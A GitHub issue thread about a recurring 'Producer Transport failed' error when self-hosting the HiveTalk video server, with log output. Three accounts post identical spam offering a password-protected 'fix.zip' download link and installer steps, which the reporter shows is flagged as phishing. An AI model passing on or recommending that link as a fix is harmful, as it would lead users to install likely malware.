### ISSUE TITLE
Producer Transport failed - Check Your Network Connectivity

### ISSUE THREAD

**Issue by happening-primal** [HiveTalk/hivetalksfu#39]
Self hosting on ubuntu 22 via npm as per the instructions provided in README.md.  

I can connect and video and audio working as expected.  After few seconds (seems random amount of time) receive the dialog box "Producer Transport failed" "Check Your Network Connectivity".  Only option is OK.

I actually had the same issue using hivetalk.org when first testing this out as well.

The issue occurs on audio only calls, and audio / video calls.

Tried multiple browsers, multiple client machines, multiple networks...same thing.

Any help greatly appreciated.

===========================================================================================

Log output.

> [8/26/2024, 12:02:54:111] [Peer] Producer [simulcast-video] -----> { scalabilityMode: 'L1T3', spatialLayer: 1, temporalLayer: 3 } +500ms
> [8/26/2024, 12:02:54:113] [Server] Produce {
>   kind: 'video',
>   type: 'videoType',
>   peer_name: 'some_random_name',
>   peer_id: '3bhNPjkADpnnqBsXAAAN',
>   producer_id: '7728696d-3944-4258-bb3d-c5907981dbf5'
> } +500ms
> [8/26/2024, 12:03:07:053] [Peer] Producer closed and deleted {
>   peer_name: 'some_random_name',
>   kind: 'audio',
>   type: 'simple',
>   appData: { mediaType: 'audioType' },
>   producer_id: '5ca56153-0ab2-44c8-bb97-2555471e5511',
>   producer_closed: true
> } +12s
> [8/26/2024, 12:03:07:109] [Peer] Producer closed and deleted {
>   peer_name: 'some_random_name',
>   kind: 'video',
>   type: 'simulcast',
>   appData: { mediaType: 'videoType' },
>   producer_id: '7728696d-3944-4258-bb3d-c5907981dbf5',
>   producer_closed: true
> } +54ms

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by happening-primal** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

virustotal ([https://www.virustotal.com/gui/url/260054b6611c723ea6394d93ac180880ee0a5311254c1623947a130fdc1aca0a](url)) indicates this is a phishing attachment.  Would not recommend anyone click on it.  Got three nearly simultaneous emails with the same "advice".

**Comment by bitkarrot** [comment]
At this point in time we do not have the bandwidth to assist with self hosting.

**Comment by bitkarrot** [comment]
I thought you were a spammer. the spam links keep coming.
